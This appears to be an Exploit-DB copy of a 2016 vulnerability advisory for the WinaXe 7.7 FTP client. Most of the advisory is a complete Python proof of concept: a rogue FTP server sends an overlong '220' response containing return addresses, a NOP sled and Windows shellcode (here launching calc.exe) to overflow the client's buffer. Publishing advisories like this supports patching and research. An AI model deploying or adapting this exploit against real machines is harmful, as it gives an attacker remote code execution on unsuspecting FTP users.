WinaXe 7.7 ‘FTP client’ – Remote Buffer Overflow

  • 作者: hyp3rlinx
    日期: 2016-11-03
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  • 来源:https://www.exploit-db.com/exploits/40693/
  • [+] Credits: John Page aka hyp3rlinx	
    
    [+] Website: hyp3rlinx.altervista.org
    
    [+] Source:http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt
    
    [+] ISR: Apparition Security
    
    
    
    Vendor:
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    www.labf.com
    
    
    
    Product:
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    WinaXe v7.7 FTP 
    
    The X Window System, SSH, TCP/IP, NFS, FTP, TFTP and Telnet software are built and provided in the package.
    All that you need to run remote UNIX and X Applications is included within WinaXe Plus. You operate simultaneously with
    X11, FTP and Telnet sessions and with your familiar MS Windows applications.
    
    
    
    Vulnerability Type:
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    Remote Buffer Overflow
    
    
    
    Vulnerability Details:
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    WinaXe v7.7 FTP client is subject to MULTIPLE remote buffer overflow vectors when connecting to a malicious FTP Server and
    receiving overly long payloads in the command response from the remote server.
    
    220 SERVICE READY 
    331 USER / PASS
    200 TYPE
    257 PWD
    
    etc...
    
    below is POC for "server ready" 220 command exploit when first connecting to a FTP server.
    
    
    Exploit code(s):
    ===============
    
    import socket,struct
    
    #WinaXe v7.7 FTP Client 'Service Ready' Command Buffer Overflow Exploit
    #Discovery hyp3rlinx
    #ISR: ApparitionSec
    #hyp3rlinx.altervista.org
    
    
    #shellcode to pop calc.exe Windows 7 SP1
    sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
    "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
    "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
    "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
    "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
    "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
    "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
    
    
    eip=struct.pack('<L',0x68084A6F)#POP ECX RET 
    jmpesp=struct.pack('<L',0x68017296) #JMP ESP
    
    #We will do POP ECX RET and place a JMP ESP address at the RET address that will jump to shellcode.
    
    payload="A"*2061+eip+jmpesp+"\x90"*10+sc+"\x90"*20 #Server Ready '220' Exploit
    
    port = 21 
    s = socket.socket()
    host = '127.0.0.1'
    s.bind((host, port))
    s.listen(5)
    
    print 'Evil FTPServer listening...'
    
    while True:
    conn, addr = s.accept() 
    conn.send('220'+payload+'\r\n')
    conn.close()
    
    
    
    
    
    Exploitation Technique:
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    Remote
    
    
    
    Severity Level:
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    High
    
    
    
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